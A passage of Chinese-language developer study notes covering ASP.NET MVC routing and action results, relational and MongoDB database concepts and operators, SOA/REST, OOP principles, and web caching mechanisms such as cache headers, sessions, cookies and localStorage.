| MaxRouteConstraint(val) | 匹配一个小于val的值 | Max(val) |
| MaxLengthRouteConstraint(val) | 匹配一个字符长度小于val的值 | MaxLength(val) |
| MinRouteConstraint(val) | 匹配一个大于val的值 | Min(val) |
| MinLengthRouteConstraint(val) | 匹配一个字符长度大于val的值 | MinLength(val) |
| RangeRouteConstraint(min,max) | 匹配一个值在min和max之间的值 | Range(min,max) |

我们可以使用CompoundRouteConstraint接收多个约束的组合。

**属性路由**

在属性路由中，路由是在控制器的类的C#属性定义的，但是属性路由扰乱了应用程序中控制器和路由配置两个部分，致使关注点合并在一起了。

要使用属性路由，我们首先要在RouteConfig类中的调用

routes.MapMvcAttributeRoutes();

1. 可选URL参数和默认值

你可以通过增加一个 "？" 标记到路由参数上去使用一个可选的URI参数。可以通过 parameter=value指定一个默认的值

[Route("Home/{Index?}")] //访问Home或Home/Index

[Route("Admin/Create/{name}/{age=18}")] //访问Admin/Create/xc或Admin/Create/xc/18

1. 路由前缀

我们可以通过设置[RoutePrefix]属性，为整个控制器设置一个共同的前缀。

[RoutePrefix("Admin")] //访问Admin打头的控制器

1. 默认路由

我们也可以在一个Controller上去使用[Route]，这个路由将被用在这个控制器所有的action上，除非一个指定的路由[Route]已经被用在一个action上（也就是重写了在这个Action的默认路由）。

[RoutePrefix("Admin")]

[Route("{action=Index}")]

//访问 Admin或Admin/Index，这个控制器下其他没有定义路由的动作方法通过方法名称访问。

1. 路由约束

路由约束可以让我们去限制怎样去匹配路由参数，例如

[Route("Create/{name:alpha}")] //限制name必须是字母

具体的限制列表如下：

| **Constraint** | **Description** | **Example** |
| --- | --- | --- |
| alpha | Matches uppercase or lowercase Latin alphabet characters (a-z, A-Z) | {x:alpha} |
| bool | Matches a Boolean value. | {x:bool} |
| datetime | Matches a **DateTime** value. | {x:datetime} |
| decimal | Matches a decimal value. | {x:decimal} |
| double | Matches a 64-bit floating-point value. | {x:double} |
| float | Matches a 32-bit floating-point value. | {x:float} |
| guid | Matches a GUID value. | {x:guid} |
| int | Matches a 32-bit integer value. | {x:int} |
| length | Matches a string with the specified length or within a specified range of lengths. | {x:length(6)}  {x:length(1,20)} |
| long | Matches a 64-bit integer value. | {x:long} |
| max | Matches an integer with a maximum value. | {x:max(10)} |
| maxlength | Matches a string with a maximum length. | {x:maxlength(10)} |
| min | Matches an integer with a minimum value. | {x:min(10)} |
| minlength | Matches a string with a minimum length. | {x:minlength(10)} |
| range | Matches an integer within a range of values. | {x:range(10,50)} |
| regex | Matches a regular expression. | {x:regex(^\d{3}-\d{3}-\d{4}$)} |

1. Areas

 我们可以使用RouteArea属性，去让控制器属于一个Area。

如果我们在同时使用用Areas和属性路由，Areas的路由基于我们在AreaRegistration中设置的，你需要去确保在配置中Area注册是在MVC 属性路由注册之后，对于这两种配置，我们都应该在 默认路由之前去注册。原因我想我不用说都应该很清楚吧，哪一个先去注册，那一个路由配置就最先去匹配URI，匹配不成功再交给下一个路由配置

routes.MapMvcAttributeRoutes();

AreaRegistration.RegisterAllAreas();

routes.MapRoute(

name: "Default",

url: "{controller}/{action}/{id}",

defaults: new { controller = "Home", action = "Index", id = UrlParameter.Optional }

);

**Get和Post选用哪一个？**

GET请求应该被用于所有只读信息检索，而POST请求应该被用于各种修改应用程序状态的操作。用标准的话语来说，GET请求用于安全的交互(除信息检索外无其他影响)，而POST 请求用于不安全的交互(做出决定或修改某些东西)。GET请求是可设定地址的---所有信息都包含在URL中，因此它可以被设定为书签并链接到这些地址。

**Controller控制器**

System.Web.Mvc.Controller是大多数MVC开发者需要熟悉的，用来对请求处理提供支持的一个类。Controller类提供了以下三个特性：

1. **动作方法**(Action Method)： 一个控制器的行为被分解成多个方法(而不是像Handler只有一个Execute方法)。每个动作方法被暴露给不同的URL，并通过从输入请求提取的参数进行调用。
2. **动作结果**(Action Result)： 你可以返回一个描述动作结果的对象（例如：返回一个视图或重定向到不同的URL或动作方法），然后通过该对象实现你的目的。这种结果和执行的分离简化了单元测试。
3. **过滤器**(Filter)： 你可以把可重用的行为封装成过滤器，然后通过在源代码中放置一个注解属性的方法，把这种行为标注在一个或多个控制器或方法中。

**接收请求参数**

控制器经常要访问来自于输入请求的数据，如查询字符串，表单值，以及路由系统根据输入URL解析得到的参数。访问这些数据主要有三种途径：

1. 通过一组**上下文对象**进行获取；常见的上下文对象包含(Request，HttpContext,RouteData,User,TempData)；
2. 作为**参数**被传递给动作方法而形成的数据；Controller父类使用了叫“值提供器(Value Provider)”和“模型绑定器(Model Binder)”的MVC框架组件来获取动作方法的参数值，它们会抓取Request.Forms，Request.QueryString，Request.Files以及RouteData.Values的数据项。
3. 明确地调用框架的**模型绑定**特性

**产生输出**

MVC框架通过使用动作结果把**指明意图**和**执行意图**分离开。它有助于实现更简单，更简洁且更一致的代码，这些代码更易于阅读和测试。MVC框架所有的内建动作结果类型都派生于ActionResult。

例如：

|  |  |  |
| --- | --- | --- |
| **类型** | **描述** | **辅助器方法** |
| ViewResult | 返回指定的或默认的视图模板 | View |
| PartialViewResult | 返回指定的或默认的分部视图模板 | PartialView |
| RedirectToRouterResult | 重定向到一个动作方法或路由 | RedirectToAction  RedirectToActionPermanent  RedirectToRoute  RedirectToRoutePermanent |
| RedirectResult | 重定向到指定的URL | Redirect |
| ContentResult | 返回文本数据 | Content |
| FilePathResult  FileContentResult  FileStreamResult | 将二进制数据直接传给浏览器 | File |
| JsonResult | 将一个.NET对象序列化为JSON格式 | Json |
| JavaScriptResult | 发送一个由浏览器执行的JavaScript源代码判断 | JavaScript |
| HttpUnauthorizedResult | 将响应的HTTP状态码设置为401，这回引发当前认证机制要求访问者登陆 | None |
| HttpNotFoundResult | 返回一个404错误 | HttpNotFound |
| HttpStatusCodeResult | 返回一个指定的HTTP状态码 | None |
| EmptyResult | 什么也不做 | None |

**详细解释：**

**PartialView**

*当需要多次使用一个页面的某一部分的时候，可以把它封装成****分部视图****。我们完全可以通过AJAX调用控制器的PartialView方法来返回不同的HTML。只是这样做所需的字节数会比返回一个JSON要多。PartialView和View的区别在于PartialView不能包含母版页。*

**RedirectToAction**

*可以转到指定的控制器中的动作方法，它采用的302重定向。*

RedirectToAction("Index","Home");

**RedirectToRoute**

*定义一个路由对象来重定向，它采用的302重定向。*

RedirectToRoute(new { controller = "Admin", action = "Index" });

**RedirectToActionPermanent**

*与****RedirectToAction****不同的是它采用的是301重定向，这种重定向对SEO更友好，因为它可以保留原网页的Ranking记录。*

**Content**

返回指定文本内容，可以指定文本类型和编码格式

**File**

显示/下载 一个文件

**Json**

返回JSON格式数据

**JavaScript**

返回一段JavaScript字符串到前台，但不执行，前台可以调用eval来执行这段代码

**Binding模型绑定**

* + new ChildActionValueProviderFactory(),
  + new FormValueProviderFactory(),
  + new JsonValueProviderFactory(),
  + new RouteDataValueProviderFactory(),
  + new QueryStringValueProviderFactory(),
  + new HttpFileCollectionValueProviderFactory()
  + ...
* **AOP面向切面（常用特性(Attribute)及自定义特性）**
  + 元数据
  + 验证基类System.ComponentModel.DataAnnotations.ValidationAttribute
    - System.ComponentModel.DataAnnotations.CompareAttribute
    - System.ComponentModel.DataAnnotations.CustomValidationAttribute
    - System.ComponentModel.DataAnnotations.DataTypeAttribute
    - System.ComponentModel.DataAnnotations.MaxLengthAttribute
    - System.ComponentModel.DataAnnotations.MinLengthAttribute
    - System.ComponentModel.DataAnnotations.RangeAttribute
    - System.ComponentModel.DataAnnotations.RegularExpressionAttribute
    - System.ComponentModel.DataAnnotations.RequiredAttribute
    - System.ComponentModel.DataAnnotations.StringLengthAttribute
    - System.Web.Security.MembershipPasswordAttribute
  + Filter
    - IAuthenticationFilter(验证过滤器 MVC5)验证是否合理请求，是否合理用户
    - IAuthorizationFilter(授权过滤器)
      * AuthorizeAttribute
      * RequireHttpsAttribute
      * ValidateAntiForgeryTokenAttribute
      * ChildActionOnlyAttribute
      * ...
    - IActionFilter(动作过滤器-前-后)
      * ActionFilterAttribute
      * ...
    - IResultFilter(结果过滤器-前-后)
      * ActionFilterAttribute
      * ...
    - IExceptionFilter(例外过滤器)
      * HandleErrorAttribute(在FilterConfig就已被注册)
      * ...
* **RazorViewEngine视图引擎**
* **WebApi**

## ****数据库技术****

* 数据库服务端、客户端、图形界面管理工具、数据库语言（PL-sql,T-sql,sql）、数据库安全等概念
* 视图、存储过程、游标、中间表、触发器、计划任务等常用技术
* 数据库分库、拆表、分布式、集群、备份、故障调控等方案
* 数据库三大范式与反范式
* RBAC（Role-Based Access Control，基于角色的访问控制）权限模型
* 数据库机制
  + **索引**
  + **存储引擎**
  + **事务**
    - 四大特性(ACID)
      * 原子性 Atomicity
      * 一致性 Consistency
      * 隔离性 Isolation
      * 持续性 Durability
    - 并发产生的问题
      * 脏读
      * 幻读
      * 不可重复读
      * ...
    - 解决方案—隔离级别
      * 读未提交Read uncommitted
      * 读已提交Read committed (mssql、oracle)
      * 可重复读Repeatable read（mysql）
      * 串行化Serializable
  + **锁机制**
    - 种类、粒度、加锁方式
    - 悲观锁:开销大，避免长事务
      * 表锁、行锁/读锁、写锁
    - 乐观锁:开销小，读大于写
      * Version版本号机制
    - ...
* 数据库辅助工具：Power Designer、EZDML、ER Studio、Rose、Microsoft Visio...

## ****关系型数据库****

先来看看它们三个的流行趋势





作者：实验楼在线教育  
链接：https://www.zhihu.com/question/19866767/answer/426919833  
来源：知乎  
著作权归作者所有。商业转载请联系作者获得授权，非商业转载请注明出处。

[**MySQL**](https://link.zhihu.com/?target=https%3A//www.mysql.com/)和[**Oracle**](https://link.zhihu.com/?target=https%3A//www.oracle.com/cn/database/index.html)**是**一种使用**SQL**语言并由Oracle维护的数据库软件。[**Microsoft SQL Server**](https://link.zhihu.com/?target=https%3A//www.microsoft.com/en-us/sql-server/)也是一种使用SQL语言并由Microsoft维护的数据库工具。Oracle最早发行，紧接着是SQL Server和MySQL。

作为广泛使用的[关系数据库管理系统（RDBMS）](https://link.zhihu.com/?target=https%3A//www.baidu.com/link%3Furl%3DZgHdJI8HZIDrabMKbg6xKUGi_qlSrFPiAxe3rLoUbcBLxfNrC9OSD8s97oCvE9BVM-GvjkigRlzYgAMkptNos_%26wd%3D%26eqid%3D88a2f6ed0000b45f000000055b31d1ca)，它们有一些相同的地方，比如辅助数据库模型都包含了文档储存和键值储存。但也存在很大差别。

**服务器操作系统**

SQL Server：

* Linux
* Windows

MySQL：

* FreeBSD
* Linux
* OS X
* Solaris
* Windows

Oracle：

* AIX
* HP-UX
* Linux
* OS X
* Solaris
* Windows
* z / OS

**支持的编程语言**

* SQL Server：C＃、C ++、Delphi、Go、Java、JavaScript（Node.js）、PHP、Python、R、Ruby、Visual Basic
* MySQL：Ada、C、C＃、C ++、D、Delphi、Eiffel、Erlang、Haskell、Java、JavaScript（Node.js）、Objective-C、OCaml、Perl、PHP、Python、Ruby、Scheme、Tcl
* Oracle：C、C＃、C ++、Clojure、Cobol、Delphi、Eiffel、Erlang、Fortran、Groovy、Haskell、Java、JavaScript、Lisp、Objective C、OCaml、Perl、PHP、Python、R、Ruby、Scala、Tcl、Visual Basic

**服务器端脚本**

* SQL Server：Transact SQL和.NET语言
* MySQL：专有语法
* Oracle：PL / SQL

**不同节点存储数据的方法**

* SQL Server：表可以分布在多个文件中（水平分区）;通过联合进行分片
* MySQL：水平分区，使用MySQL Cluster或MySQL Fabric进行分片
* Oracle：水平分区

**数据库**

* Oracle：最贵，功能最多，安装最不方便，Oracle环境里的其他相关组件最多，支持平台数量一般，使用中等方便，开发中等方便，运维中等方便，不开源，速度最慢，最安全。
* Microsoft SQL Server 2014：中等贵，功能最少，安装中等方便，Microsoft SQL Server 2014环境里的其他相关组件最少，支持平台最少，使用最方便，开发最方便，运维最方便，不开源，速度中等，一般安全。
* Mysql：免费，功能中等，安装最方便，Mysql环境里的其他相关组件数量中等，支持平台最多，使用最不方便，开发最不方便，运维最不方便，有开源版本，速度最快，最不安全。

Oracle的客户端和命令窗口，都是由用户决定内容 conn user\_name/password;

MySQL的客户端和命令窗口，都是由数据库决定内容 use datebase;

Oracle和MSSQL的纯RDBMS层主要提供比MySQL和InnoDB更成熟的可编程环境。MySQL存储过程和触发器还不能匹配T-SQL和PL / SQL。在MySQL（RDBMS层）的MSSQL（报告服务，分析服务）和Oracle（数据仓库，RAC）之上有大量的集成工具和服务，MySQL尚未具备这些工具和服务。

## 总结

Oracle处理效能最快，而就以每秒交易量与价格比较的话，SQL Server最有效益，而MySQL也有不错的表现。Oracle传统，跨平台，稳定，适合OLTP，最接近数据库设计范式，一致性处理是最好的，也是最复杂的。适合金融，电信等企业。要想用好并发挥其性能，对管理员的能力要求较高。另维护成本较高。SQL Server目前只能在Windows系列执行，限制其发展。但在Unix与Linux都有非常高的稳定度与效能。MySql适合开发者，简单。不过随着Oracle的入主，功能越来越完善，又因为其开源，阿里开发了改进大数据库，性能和应用场景不断拓宽，形势大好。

## ****非关系型数据库(Nosql-Not Only Sql)****

* MongoDb：是一个基于分布式文件存储的数据库
* Hbase：属于hadoop(分布式系统)生态圈的组件，能存储海量数据
* Cassandra：优异的列式存储NoSQL
* Redis：基于内存的数据存储系统，支持多种类型存储，适用于高并发场合
* Memcache：基于内存的数据存储系统，高性能分布式内存缓存服务，适用于高并发场合

MongoDB

**MongoDB的安装**

* 首先下载Linux x64的安装包: <https://www.mongodb.com/download-center#atlas>
* 将安装包放到/usr目录下解压mongodb
* 在mongodb的根路径下创建一个data文件夹，data里在创建一个db文件夹
* 在mongodb的bin目录下打开终端执行：./mongod --dbpath=../data/db启动服务
* 然后我们测试一下是否可以使用MongoDB吧，在bin目录另外打开终端执行：mongo 会看到当前MongoDB的版本。
* 运行mongo 打开客户端，或者使用使用管理工具如robo
* **MongoDB与SQL的对应表**

|  |  |
| --- | --- |
| **SQL** | **MongoDB** |
| Database | database |
| Table | Collection |
| Row | Document |
| Column | Field |
| Index | Index |
| Table join | $lookup,embedded document |
| Primary key | Primary key |
| Aggreagation(聚合) | Aggregation pipeline |

**关系运算符**

等于 => $eq 语法结构:{field:{$eq:value}}

不等于 => $ne 语法结构:{field:{$ne:value}}

大于 => $gt 语法结构:{field:{$gt:value}}

大于等于 => $gte 语法结构:{field:{$gte:value}}

小于 => $lt 语法结构:{field:{$lt:value}}

小于等于 => $lte 语法结构:{field:{$lte:value}}

包含 => $in 语法结构:{field:{$in:[value1,value2,...]}}

不包含 => $nin 语法结构:{field:{$nin:[value1,value2,...]}}

**逻辑运算符**

并且 => $and 语法结构:{$and:[ Expression1, Expression2, ...]}

或者 => $or 语法结构:{$or:[ Expression1, Expression2, ...]}

或非 => $nor 语法结构:{$nor:[ Expression1, Expression2, ...]}

非 => $not 语法结构:{field:{$not:{operation-exrpession}}}

**Expression例子：{price:{$eq:10}}**

**operation-exrpession例子:{$eq:10}**

**元素运算符**

是否存在 => $exists 语法结构:{field:{$exist:<boolean>}}

是否为该类型 => $type 语法结构:{field:{$type:<BSON type>}}

**评估运算符**

求模 => $exists 语法结构:{$field:{$mod:[除数，余数]}}

正则表达式 => $regex 语法结构:{field:{$regex:/pattern/<options>}}

where条件 => $where 语法结构:{$where:function{ return <Boolean>; }}

**options枚举：**

**i => 忽略大小写**

**m => 匹配多条结果**

**x => 忽略所有的空格**

**s => .可以匹配所有的包扩新行在内的所有字符**

**数组运算符**

全部条件符合 => $all 语法结构:{field:{$all:[value1，value2， ...]}}

任意条件符合 => $elemMatch 语法结构: {field:{$elemMatch:[query1，query2，...]}}

数组长度符合 => $size 语法结构: {field:{$size:<int32>}}

**query例子：{$gt : 100} 或者 {$eq: ‘A’ }**

**列修改运算符**

加法 => $inc 语法结构:{$inc:{field1:<amount>},{field2:<amount>},...}

乘法 => $mul 语法结构:{$mul:{field1:<number1>,...}}

改名称 => $rename 语法结构 : {$rename:{<field1>:<NewName1>,<field2>:<NewName2>,...}}

改值 => $set 语法结构 :{$set:{<field1>:<value1>,<field2>:<value2>,...}}

详解：如果修改的值不存在则新增，存在则修改

无法修改时则添加 => $setOnInsert语法结构：{$setOnInsert:<field1>:<value1>,...},{upsert:true}

详细解释: 如果update的更新参数upsert:true，也就是如果要更新的文档不存在的话会插入一条新的记录，$setOnInsert操作符会将指定的值赋值给指定的字段，如果要更新的文档存在那么$setOnInsert操作符不做任何处理；

删除列 => $unset 语法结构：{$unset:{<field1> :“”,... }}

求最小值 => $min 语法结构：{$min:{<field1> : <value1>,...}}

求最大值 => $min 语法结构：{$max:{<field1> : <value1>,...}}

求当前时间 => $currentDate：{$currentDate:{<field>:}}

**数组修改运算符**

首个元素的占位符 => $ 语法结构:{‘<Array>.$’:value}

例子：db.students.updateOne({\_id:1,'grades':80},{$set:{'grades.$':90}});

这句命令的意思是修改id等于1并且grades包含80的数组，将grades里的第一个元素改成90

所有元素的占位符 => $[] 语法结构:{ <update operator>: { "<array>.$[]" : value } }

例子：db.students.update({ \_id:4},

{$inc:{'grades.$[].grade':100} //让所有的grade+100},

{multi:true});

这句命令的意思是，修改\_id等于4的数组，将grades里所有的grade加100

添加元素 => $addToSet 语法结构: {$addToSet:{field1:value1,.....}}

如果不存在则添加，如果存在则不添加。

出栈 => $pop 语法结构: {$pop:{<field>:<-1 | 1>,......}}

例子：{ \_id: 1, scores: [ 8, 9, 10 ] } //元数组

db.students.update( { \_id: 1 }, { $pop: { scores: -1 } } ) //移除第一个元素

{ \_id: 1, scores: [ 9, 10 ] } //出栈后

当field的值为1时移除最后一个元素，为-1时移除第一个元素

删除 => $pull 语法结构:{ $pull: { <field1>: <value|condition>, <field2>: <value|condition>, ... } }

删除数组中所有匹配条件的元素

例子：db.stores.update({},

{$pull:{fruits:{$in:['bananas','oranges']}}},

{multi:true //别忘了加上这个，要不然只能修改一行});

这句命令的意思是删除数组中包含bananas和oranges的元素

**CRUD操作**

新增操作有三个命令：insert,insertOne,insertMany

Insert可以插入一个Document或者Array

InsertOne只能插入一条Document

InsertMany可以插入一个Array

读取操作最简单的命令是find，输入条件可以查询所有数据.

其次还有findAndModify，由此引申出findOneAndDelete,findOneAndUpdate,

findOneAndReplace，这些操作实现了一系列事务操作。

修改操作有四个命令：update，updateOne，updateMany和修改行数插入命令类似。ReplaceOne和findOneAndReplace类似。

删除操作有三个命令：remote，deleteOne，deleteMany

Remote可以删除一行或多行，deleteOne只能删除一行，deleteMany可以删除多行。

**索引操作**

MongoDB中所多种类型的索引：

单键索引： Single Field Index

复合索引： Compound Index

**分布式文件系统**

MongoDB内置一套文件系统名为GridFS（Grid File System）

我们可以使用它来存储大于16M的文件。

它具有多机器存储备份，可以突破一般文件系统对file的限制，分段存储，不像普通file system是整个存储的。这样读取大型文件时就不会占用大量的内存。

支持多种驱动，如Java，C#等

GridFS会将文件存储在两个Document里：

1. Chunks用来存储二进制数据
2. Files用于存储基本文件信息

具体的命令我们可以参考以下链接：

<https://docs.mongodb.com/manual/reference/program/mongofiles/index.html>

其中最简单的包括：

存储文件：mongofiles –d <database> put <filename>

删除文件：mongofiles –d <database> delete <filename>

获取文件：mongofiles –d <database> -l <new\_filename> get <filename>

常用的命令还有：

--host <hostname><:port>

--port <port>

**聚合操作**

MongoDB中有一个聚合工具：Aggregate，类似于SQL语句中的Group By。聚合工具可以让开发人员直接使用MongoDB的原生的命令操作数据库中的数据，并按要求进行聚合，聚合大幅提高了开发效率。

Aggregate PipeLine指的是命令将会按照顺序依次执行，并且管道操作可以重复，它的工作原理如图所示：



Aggreagte是一个数组，其中包含多个对象（命令），通过遍历PipeLine数组对Collection中数据的操作

你可以调用一下的阶段（stages）：

$lookup：相当于左外连接，它的语法如下：

{

$lookup:

{

From:<外联接的集合 >,

localField:<连接的列名>,

foreignField:<外联接的列名>,

as:<输出的列名>

}

}

$match：相当于过滤条件，它的语法如下：

{ $match :{<query>}}

$group：可以分组来计算出结果

{

$group:

{

\_id:<expressing>,

<field1>:{<accumulator1>:<expression1>},

……

}

}

具体解释：

Expression：我们可以使用“$属性名”或“$属性名.属性名….”来表示一个字段

Accumulator：累计运算符有很多中，常见的有$avg,$first,$last,$max,$min,$sum等。

$project：标记要显示的列名

{

$project:

{

\_id:0 or 1,

<field>:0 or 1,

}

}

Aggreagte pipeLine的优势包括：可以对超过BSON限制（16M）的数据进行处理，2可以分片。

**查询计划(Query Plan)**

我们可以使用db.Collection.explain()来查看查询计划，它可以为我们制定优化方案提供支持。

每次我们查询时都会生成一个查询计划，下次再查询时，系统会优先考虑之前缓存下来的查询计划。具体步骤如图所示。



要注意的是查询计划会在重启或关闭时清空。

索引创建策略

1. 如果查询只查询单个键，只需建立单键索引即可
2. 如果查询要支持多种条件，则需要建立复合索引。

比如：

{ "category": 1, "item": 1 }

可以用： category做前缀

也可以用：category + item

千万不要： item + category 这种模式。。。

1. Sort时最好Sort的键也在索引上
2. 索引最好能存储在内存中
3. 确保索引的高选择性（可用复合索引代替单键索引和复合索引）

## ****面向服务架构SOA****

* 通过服务整合来解决系统集成的一种思想
* .
* WSDL
  + Web Services Description Language是一个用来描述Web服务和说明如何与Web服务通信的XML语言。为用户提供详细的接口说明书
* UDDI
  + Universal Description，Discovery and Integration统一描述、发现和集成, 提供一种发布和查找服务描述的方法。UDDI 数据实体提供对定义业务和服务信息的支持。
* SOAP
  + Simple Object AccessProtocol，简单对象访问协议，基于XML 和 HTTP 用于在应用程序之间进行通信的一种通信协议
    - Web Services：基于SOAP协议，数据格式是XML
    - Wcf/Wcf Rest：可以不依赖于IIS，基于SOAP，支持多种通信协议，但配置繁琐
  + 测试工具：SoapUI...
* REST
  + REpresentational State Transfer ，表现层状态转移，是一种架构风格，提供了设计概念原则和约束。
  + RESTful
    - 满足这些原则和条件的就称RESTful架构
    - Web API：RESTful的实现，一个用于构建HTTP服务的框架
  + 测试工具：Fiddler、Postman、Jmeter...
* 微服务
  + 是SOA的一种实现，更侧重于组件化和服务化
* JSON-RPC
  + Remote Procedure Call Protocol，远程过程调用协议，高性能二进制协议，比RESTful要高效（类似于Web Services的使用风格）

## ****面向对象OOP****

* 三大基本特性
  + 继承，封装，多态
    - 抽象类abstract和接口interface的各种用法及实现
    - Virtual、abstract、override、New、extern等关键字的含义及用法
    - 设计模式的应用
    - ...
* 六大基本原则（高内聚，低耦合）
  + 单一职责原则SRP(Single Responsibility Principle)
  + 开放封闭原则OCP(Open－Close Principle)
  + 里式替换原则LSP(the Liskov Substitution Principle)
  + 依赖倒置原则DIP(the Dependency Inversion Principle)
  + 接口分离原则ISP(the Interface Segregation Principle)
  + 最少知识原则LKP(Least Knowledge Principle）（也称：迪米特原则）
* 23种设计模式
  + 创建型
  + 结构型
  + 行为型

## ****缓存及优化技术****

* 浏览器自身缓存技术(cache control,与服务器约定,js /css等缓存)
* Session(SessionId)(会话,为了弥补http协议的无状态特性)
* Cookie(浏览器存储,为了弥补http协议的无状态特性)
* Localstorage(Html5新特性 浏览器本地存储,为了弥补Cookie存储不足)
* Application(服务器全局变量)
* Static(依赖于IIS，进程回收会丢失)
* Cache(服务器缓存)
* 为了更清楚的了解，我们总结出每一种对象应用的具体环境，如下表所示：
* 
* **浏览器缓存**
* 概念：简单来说，浏览器缓存就是把一个已经请求过的Web资源（如html页面，图片，js，数据等）拷贝一份副本储存在浏览器中。缓存会根据进来的请求保存输出内容的副本。当下一个请求来到的时候，如果是相同的URL，缓存会根据缓存机制决定是直接使用副本响应访问请求，还是向源服务器再次发送请求。比较常见的就是浏览器会缓存访问过网站的网页，当再次访问这个URL地址的时候，如果网页没有更新，就不会再次下载网页，而是直接使用本地缓存的网页。只有当网站明确标识资源已经更新，浏览器才会再次下载网页。至于浏览器和网站服务器是如何标识网站页面是否更新的机制，将在后面介绍。
* 报文头里的一些关键信息：
* Expires：Http1.0 中的标准，表明过期时间，注意此处的时间都是指的是服务器的时间。
* Cache-Control：Http1.1 中的标准，可以看成是 expires 的补充。使用的是相对时间的概念。
* Cache-Control的属性：
* max-age: 设置缓存的最大的有效时间，单位为秒（s）。max-age会覆盖掉Expires
* s-maxage: 只用于共享缓存，比如CDN缓存（s -> share）。与max-age 的区别是：max-age用于普通缓存，  
  而s-maxage用于代理缓存。如果存在s-maxage,则会覆盖max-age 和 Expires.
* public：响应会被缓存，并且在多用户间共享。默认是public。
* private: 响应只作为私有的缓存，不能在用户间共享。如果要求HTTP认证，响应会自动设置为private。
* no-cache: 指定不缓存响应，表明资源不进行缓存。但是设置了no-cache之后并不代表浏览器不缓存，而是在缓存前要向服务器确认资源是否被更改。因此有的时候只设置no-cache防止缓存还是不够保险，还可以加上private指令，将过期时间设为过去的时间。
* no-store: 绝对禁止缓存。
* Last-modified: 表明请求的资源上次的修改时间。
* If-Modified-Since：客户端保留的资源上次的修改时间。
* Etag：资源的内容标识。（不唯一，通常为文件的md5或者一段hash值，只要保证写入和验证时的方法一致即可）
* 所以缓存的调用步骤是：  
  1） 查看是否有cache-control 的max-age / s-maxage , 如果有，则用服务器时间date值 + max-age/s-maxage 的秒数计算出新的过期时间，将当前时间与过期时间进行比较，判断是否过期  
  2）如果没有，则用expires 作为过期时间比较
* 3）如果过期了，则请求服务器，服务器接收到请求之后，通过Last-Modified和Etag判断文件是否修改过，如果没有修改过则发送一个304到客户端，告诉浏览器直接从自己本地的缓存取数据；如果修改过那就整个数据重新发给浏览器。
* 
* 参考资料：
* <https://www.cnblogs.com/slly/p/6732749.html#undefined>
* <https://www.cnblogs.com/shixiaomiao1122/p/7591556.html>
* <https://segmentfault.com/a/1190000011212929>
* 具体实现：
* <meta http-equiv="Expires" content="0"/>
* <meta http-equiv="Cache-Control" content="no-cache"/>
* **Session会话**
* 1、 InProc Session Provider是最快的，因为所有数据都存在应用程序的内存里，Session数据在IIS重启，或者站点被回收的情况下丢失，你可以在用户量较小的网站上使用这种模式，但别在Web Farm下使用。
* 2、 State Server模式：Session数据被存储于aspnet\_state.exe应用中，他在Web服务之外保存Session数据，所以Web服务出现问题不会对他的Session数据造成影响，在将Session数据存储到StateServer之前需要序列化对象，在Web Farm中我们能安全地使用这个模式。
* 3、 SQL Server模式：他将Session数据保存到SQL Server中，我们需要提供连接串，我们存储时也需要对对象进行序列化，这种模式在实际Web Farm的生产环境中是非常有用的。
* 4、 Custom模式，当我们需要使用一个已经存在的表来存储Session数据时，在自定义模式中，我们也能创建自定义的Session ID，但是不推荐你自己来实现Provider，推荐使用第三方的Provider。
* 参考资料：
* <https://www.cnblogs.com/ideacore/p/6423281.html>
* [ASP.NET性能优化之分布式Session](http://www.cnblogs.com/luminji/archive/2011/11/03/2195704.html)
* **Cookie机制**
* Cookie的作用
* 比如你登录录邮箱，登录一个页面。我们经常会在此时设置30天内记住我，或者自动登录选项
* Cookie的分类
* cookie分为会话cookie和持久cookie，会话cookie是指在不设定它的生命周期expires时的状态，前面说了，浏览器的开启到关闭就是一次会话，当关闭浏览器时，会话cookie就会跟随浏览器而销毁。当关闭一个页面时，不影响会话cookie的销毁。会话cookie就像我们没有办理积分卡时，单一的买卖过程，离开之后，信息则销毁。
* 持久cookie则是设定了它的生命周期expires，此时，cookie像商品一样，有个保质期，关闭浏览器之后，它不会销毁，直到设定的过期时间。对于持久cookie，可以在同一个浏览器中传递数据，比如，你在打开一个淘宝页面登陆后，你在点开一个商品页面，依然是登录状态，即便你关闭了浏览器，再次开启浏览器，依然会是登录状态。这就是因为cookie自动将数据传送到服务器端，在反馈回来的结果。持久cookie就像是我们办理了一张积分卡，即便离开，信息一直保留，直到时间到期，信息销毁。
* Cookie的限制
* **Cookie的性质上是绑定到当前域名下的。**当设定了当前Cookie后，再给创建它的域名发送请求时都会包含这个cookie。
* 每个域的Cookie是有数量限制的，不同的浏览器之间各不相同：
* IE6及之前的版本限制每个域最多20个cookie
* IE7及之后的版本限制50个cookie
* Firefox限制每个域最多50个cookie
* Opera限制每个域最多30个cookie
* Safari和Chrome对cookie的数量没有限制
* 浏览器对域的大小也有限制，大多数浏览器都有大约**4kb的长度限制**
* Cookie的构成
* Cookie由浏览器保存由以下信息组成：
* **名称**：cookie的名称，具有唯一性，不区分大小写，cookie名称必须经过URL编码
* **值**：存储在cookie中的字符串值，必须经过URL编码
* **域**：cookie只对指定域有效。所有向该域发送的请求都会包含该cookie信息。这个值可以包含子域(如：[www.baidu.com](http://www.baidu.com))，也可以不包含子域(如:baidu.com，这样就对baidu.com所有子域都有效，这是实现单点登陆的关键)
* **路径**：对于指定域中的那个路径，应该向服务器发送cookie。例如：你可以指定向[www.baidu.com/pay](http://www.baidu.com/pay)发送cookie，而[www.baidu.com不会发送cookie](http://www.baidu.com不会发送cookie)。
* **失效时间**：表示cookie何时应该被删除的时间戳，这个值是GMT 格式的日期
* **安全标志**：指定后，cookie只有在使用SSL连接时才会发送到服务器。
* 参考资料：
* <https://blog.csdn.net/u014753892/article/details/52821268>
* LocalStorage和SessionStorage
* HTML5 提供了两种在客户端存储数据的新方法：
* localStorage - 没有时间限制的数据存储
* sessionStorage - 针对一个 session 的数据存储
* 之前，这些都是由 cookie 完成的。但是 cookie 不适合大量数据的存储，因为它们由每个对服务器的请求来传递，这使得 cookie 速度很慢而且效率也不高。
* 要访问同一个LocalStorage，页面必须来自同一个域名(子域名无效)，使用同一种协议，在同一个端口上。
* 在 HTML5 中，数据不是由每个服务器请求传递的，而是只有在请求时使用数据。它使在不影响网站性能的情况下存储大量数据成为可能。
* **限制**
* 对于localStorage而言，大多数浏览器会有5MB的限制
* SessionStorage有的浏览器没有限制，有的有2.5MB和5MB的限制
* 参考网址：
* <http://www.w3school.com.cn/html5/html_5_webstorage.asp>
* Application
* Application相当于应用程序的“全局变量”，如图所示：
* 
